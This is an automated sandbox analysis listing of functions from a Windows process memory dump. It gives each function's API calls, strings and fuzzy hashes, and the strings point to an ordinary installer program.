Opcode Fuzzy Hash: dc46f87aefadf03c832279afaf1de0c6b497e464b5d3ad6a3c82fe943312a327
Instruction Fuzzy Hash: 01115A716442109FEB109A28DC85F9A73E4AB44724F24817AFD9CDF2D6C7789C50877A

Uniqueness

Uniqueness Score: -1.00%

Function 00402F1C, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00402FFC,00408E5C,00000000,00408E7E), ref: 00402F3A
VirtualFree.KERNEL32(00508AD0,00000000,00008000,?,00000000,00008000,?,?,?,?,00402FFC,00408E5C,00000000,00408E7E), ref: 00402F97

Strings

l P, xrefs: 00402F4A
,jP, xrefs: 00402F20

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeVirtual
String ID: ,jP$l P
API String ID: 1263568516-2491355162
Opcode ID: b7d25b19b1d040bc7e45151835a1b7e07e6d0c87cb1ae3db7f99725461c928d7
Instruction ID: ccfde0bd53bbbbf31df0cc1884c8b3e79bfdb2c398f7c21764665423015a2374
Opcode Fuzzy Hash: b7d25b19b1d040bc7e45151835a1b7e07e6d0c87cb1ae3db7f99725461c928d7
Instruction Fuzzy Hash: E31165717006019BD7149F059988B2ABEE5E784750F15C07EF209AF3D1D6B9DC019758

Uniqueness

Uniqueness Score: -1.00%

Function 004AF9A8, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

WaitForInputIdle.USER32 ref: 004AF9D4
MsgWaitForMultipleObjects.USER32 ref: 004AF9F6
GetExitCodeProcess.KERNEL32 ref: 004AFA07
CloseHandle.KERNEL32(00000001,004AFA34,004AFA2D,?,?,?,00000001,?,?,004AFDD6,?,0000003C,00000000,004AFDEC), ref: 004AFA27

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
String ID:
API String ID: 4071923889-0
Opcode ID: f96298978968fc0bf28d8eaa0b9a7b3f23e31608e047a47fbe0ec4400a571771
Instruction ID: ec98638fec8b4c59f707463353998ef2b7cc20731e6726f35f7d2b9a88429f14
Opcode Fuzzy Hash: f96298978968fc0bf28d8eaa0b9a7b3f23e31608e047a47fbe0ec4400a571771
Instruction Fuzzy Hash: E601F570A403047EEB2097E68C06FAB7BACDB5A720F600137F504D32D2D6B88D00C669

Uniqueness

Uniqueness Score: -1.00%

Function 004DEA98, Relevance: 6.0, APIs: 4, Instructions: 34sleepCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 004DEAB8
GetLastError.KERNEL32 ref: 004DEAC2
GetTickCount.KERNEL32 ref: 004DEACC
Sleep.KERNEL32(00000032), ref: 004DEADC

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CountSleepTick
String ID:
API String ID: 2227064392-0
Opcode ID: d8cbcb4081dcff08b72cd6696ac8573044ea880dc2f17ba49bb442646edf931c
Instruction ID: 1e46be7a8cc3b4af5acae25bd8e9ff16efaa17af0cf3f7a25a61c22b9beaa5f2
Opcode Fuzzy Hash: d8cbcb4081dcff08b72cd6696ac8573044ea880dc2f17ba49bb442646edf931c
Instruction Fuzzy Hash: A7E02BA230924329DA33356F189157F6545DAD2B15F28093FF0C4D6342C81D4D0E512E

Uniqueness

Uniqueness Score: -1.00%

Function 00441B4C, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 240COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 00441D9E
OffsetRect.USER32(?,000000FF,000000FF), ref: 00441DDF

Strings

..., xrefs: 00441C99, 00441D5D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: OffsetRect
String ID: ...
API String ID: 177026234-440645147
Opcode ID: 9b6f1a6c90d19fdab908977e88c1fcfa124f7f2e3165ad2188b6df2f50122979
Instruction ID: b86cd83c616bc19477878014547529188140967f7864a80cd3d85a49f49713b9
Opcode Fuzzy Hash: 9b6f1a6c90d19fdab908977e88c1fcfa124f7f2e3165ad2188b6df2f50122979
Instruction Fuzzy Hash: E4915D74A001049BEB11DFA9C985BDA77F5AF49304F2440B6E805EB3A6D778EE81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004B8190, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 004AAC74: SetEndOfFile.KERNEL32(?,?,004B8267,00000000,004B83F9,?,00000000,00000002,00000002), ref: 004AAC7B

FlushFileBuffers.KERNEL32(?,00000080), ref: 004B83C5

Strings

NumRecs range exceeded, xrefs: 004B82BC
EndOffset range exceeded, xrefs: 004B82F3

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$BuffersFlush
String ID: EndOffset range exceeded$NumRecs range exceeded
API String ID: 3593489403-659731555
Opcode ID: c003c3efc606d37730ac4e9abecd5e69e6bc20e22a483bf81553218ca4ffbb8d
Instruction ID: ee00a79579a7ad40b7723e2a7905eded266f5c9248d3b4cea0f408e4ae8acfa2
Opcode Fuzzy Hash: c003c3efc606d37730ac4e9abecd5e69e6bc20e22a483bf81553218ca4ffbb8d
Instruction Fuzzy Hash: 8E616434A002548FCB24DF25C891ADAB7B5FF49304F0444DAE989AB396DB74AEC5CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004E0420, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148windowCOMMON

Download Yara Rule

APIs

SendNotifyMessageW.USER32(000C025E,00000496,00002711,-00000001), ref: 004E0648

Strings

MS PGothic, xrefs: 004E049C, 004E04AF
H, xrefs: 004E0467, 004E0479

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageNotifySend
String ID: MS PGothic$ H
API String ID: 3556456075-689709186
Opcode ID: bd2f2502559dfb1430f00508a7b90b8e215b56d82d1d4d61ceae89a39a8cfd72
Instruction ID: 70a8af17b21394a0c53c4b04d40a4f99bdbf1127fad7a61562f0c4bade8fa5c9
Opcode Fuzzy Hash: bd2f2502559dfb1430f00508a7b90b8e215b56d82d1d4d61ceae89a39a8cfd72
Instruction Fuzzy Hash: 2951CF302001458BDB00FF26ECC5A5E33A1FB94305F5441BBA9149B3A6CBB8DC86DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004E644C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,004E65EB,?,00000000,004E6631,?,?,?,?,00000000,00000000,00000000,?,004C9816), ref: 004E6487
SetActiveWindow.USER32(?,00000000,004E65EB,?,00000000,004E6631,?,?,?,?,00000000,00000000,00000000,?,004C9816), ref: 004E649E

Strings

Will not restart Windows automatically., xrefs: 004E65CB

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveForeground
String ID: Will not restart Windows automatically.
API String ID: 307657957-4169339592
Opcode ID: 77f1ffc58902415c2b23f13a1721229cfabdde7d299e4dcb3a58864fc6401046
Instruction ID: 19ea1f5101ae6c63aa118aa875a9ba9ae92426e44906ba9e73fd7093ebf82884
Opcode Fuzzy Hash: 77f1ffc58902415c2b23f13a1721229cfabdde7d299e4dcb3a58864fc6401046
Instruction Fuzzy Hash: C141D3302442C0EFD710DF67E855B6DBBE0EB26345F1644A7E8018B3A1C678A808EB1D

Uniqueness

Uniqueness Score: -1.00%

Function 004D6940, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107timeCOMMON

Download Yara Rule

APIs

LocalFileTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,004D6A78,?,00000000,004D6A89,?,00000000,004D6AD9), ref: 004D6A49
SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000,00000000,004D6A78,?,00000000,004D6A89,?,00000000,004D6AD9), ref: 004D6A5D

Strings

Extracting temporary file: , xrefs: 004D698E

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime$Local
String ID: Extracting temporary file:
API String ID: 791338737-4171118009
Opcode ID: 86fd96dfbfc12b21828ba5bd62e8690bfad877703ae471918113c9382eee8795
Instruction ID: 728862e51a7335a76a8c34cf8f1e3f3a3ab4f61db3c3984f5e0542ff4639c324
Opcode Fuzzy Hash: 86fd96dfbfc12b21828ba5bd62e8690bfad877703ae471918113c9382eee8795
Instruction Fuzzy Hash: E1415774A002489FCB01DFA5CC92AAEBBF9FB09704F5144AAF904B7791D7789E00DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004AE274, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AE369,?,00000000,0050B17C,00000003,00000000,00000000,?,004DE8D3,00000000,004DE9FE), ref: 004AE2BC
GetLastError.KERNEL32(00000000,00000000,?,00000000,004AE369,?,00000000,0050B17C,00000003,00000000,00000000,?,004DE8D3,00000000,004DE9FE), ref: 004AE2C5

Strings

.tmp, xrefs: 004AE2A5

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: a9183d845f534454eb83feef88359727353d1ec28aec1cef63f69866a668b7bb
Instruction ID: 59cf80837acadacf4dd19d02b3c6e15e9a136b542cc0164b9d731fa9c604ed4c
Opcode Fuzzy Hash: a9183d845f534454eb83feef88359727353d1ec28aec1cef63f69866a668b7bb
Instruction Fuzzy Hash: 8D218B75A002089FDB00EBA5C842ADFB3F9EB59304F50457BF911B7741DB389E058BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004AD01C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 004AD070
GetLastError.KERNEL32(00000000,00000000,?,?,?,004B3204,00000000,1K,?,00000000,00000000,004AD096,?,?,00000000,00000001), ref: 004AD078

Strings

1K, xrefs: 004AD056, 004AD059

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastProcess
String ID: 1K
API String ID: 2919029540-3277982518
Opcode ID: 144662c0b0594d9c35e36e100f5b20ad1331b1d9b05d041d054b4059bdf404b0
Instruction ID: 27121663f750f90800333315159ebe3e6f3250123c95a32b13b6f8b2a9e53e98
Opcode Fuzzy Hash: 144662c0b0594d9c35e36e100f5b20ad1331b1d9b05d041d054b4059bdf404b0
Instruction Fuzzy Hash: B4117C72A04208AF8B50CEA9DC81DDF77ECEB8E314B504566F918D3641DA38ED1187A4

Uniqueness

Uniqueness Score: -1.00%

Function 00470BFC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00470C53
EnumThreadWindows.USER32(00000000,00470BAC,00000000), ref: 00470C59

Strings

W3K, xrefs: 00470C9D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CurrentEnumWindows
String ID: W3K
API String ID: 2396873506-2211912719
Opcode ID: 5407122a50f12af186fd797ae979ed9efde204bb6f4d7b2e98164dea3d88b7c9
Instruction ID: 0c64724396f852626b1d1ba3a4eefb00f80bcf4b64300bdf5b79b1880e5323f7
Opcode Fuzzy Hash: 5407122a50f12af186fd797ae979ed9efde204bb6f4d7b2e98164dea3d88b7c9
Instruction Fuzzy Hash: D3119E70A09740EFE31ACF36DD10A4ABBECFB99714F218576E804E3361EB345E089A14

Uniqueness

Uniqueness Score: -1.00%

Function 00480D4C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

SHAutoComplete.SHLWAPI(00000000,00000001), ref: 00480DC4

Part of subcall function 0047F740: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047F753

Part of subcall function 00413C38: SetErrorMode.KERNEL32(00008000,?), ref: 00413C42
Part of subcall function 00413C38: LoadLibraryW.KERNEL32(00000000,00000000,00413C8C,?,00000000,00413CAA,?,00008000,?), ref: 00413C71

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Strings

shlwapi.dll, xrefs: 00480D84
SHAutoComplete, xrefs: 00480DA1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
String ID: SHAutoComplete$shlwapi.dll
API String ID: 395431579-1506664499
Opcode ID: 4217438cb196449aaf692266dfd182b2e53cfb1efeed1fad7fe7980307e832a2
Instruction ID: f9a17cf6751b6d8d0dfc75ccfce423406b49bb0c2e2d158275f503a9d5ed9283
Opcode Fuzzy Hash: 4217438cb196449aaf692266dfd182b2e53cfb1efeed1fad7fe7980307e832a2
Instruction Fuzzy Hash: D301D230614308AFE790FBA1DC92F9E77ECEB45708F50487AE40062691D7B8AD4CCB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A124, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 0040A163

Strings

TWindowDisabler-Window, xrefs: 0040A161
W3K, xrefs: 0040A13D, 0040A140

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID: TWindowDisabler-Window$W3K
API String ID: 716092398-2310209281
Opcode ID: 525154ca484f26252d46408543c51958e5444091af8ab4db31887610460425bf
Instruction ID: f482a91b61e37fa524220f56b4221b3e08f072a29bcffce70241aac4ef41fcfc
Opcode Fuzzy Hash: 525154ca484f26252d46408543c51958e5444091af8ab4db31887610460425bf
Instruction Fuzzy Hash: 9CF097B2600118BF8B40DE9DDC81DDF77ECEB4D265B054129FA0CE7201D634ED1087A4

Uniqueness

Uniqueness Score: -1.00%

Function 0042DA8C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0042DAEE

Part of subcall function 0042D96C: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042DA08

KiUserCallbackDispatcher.NTDLL ref: 0042DAB4

Strings

GetSystemMetrics, xrefs: 0042DA9C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCallbackDispatcherMetricsProcSystemUser
String ID: GetSystemMetrics
API String ID: 54681038-96882338
Opcode ID: 0a22105e880c12680412c353e7a1e70c8679e61f69015108c203138733f47b24
Instruction ID: 3c8ac70bac4857bcc7f9e7fc69a6e8620fde02ef0d95847c6b6124ab5750cff9
Opcode Fuzzy Hash: 0a22105e880c12680412c353e7a1e70c8679e61f69015108c203138733f47b24
Instruction Fuzzy Hash: 48F03070F2C2A05ACB105A34FC89E27395AA796334FE04737E512962D5C6BD9C49E31E

Uniqueness

Uniqueness Score: -1.00%

Function 004797F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 00479805
LoadCursorW.USER32(00000000,00000000), ref: 00479837

Strings

8=P, xrefs: 00479815

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorLoad
String ID: 8=P
API String ID: 3238433803-3568989296
Opcode ID: d6daad5523d3a7c520d40e65917cf2ba34bd3de270a223e33dc55c1c351908dc
Instruction ID: 9a11a810e5521d7f9341e0e65e822e2c76b295f3ddaed8bec4abe59de2850128
Opcode Fuzzy Hash: d6daad5523d3a7c520d40e65917cf2ba34bd3de270a223e33dc55c1c351908dc
Instruction Fuzzy Hash: 7EF08261B016041ADA20653E8CD0EBE73989FC3774F25433BF97DCB2D1C6391C0651AA

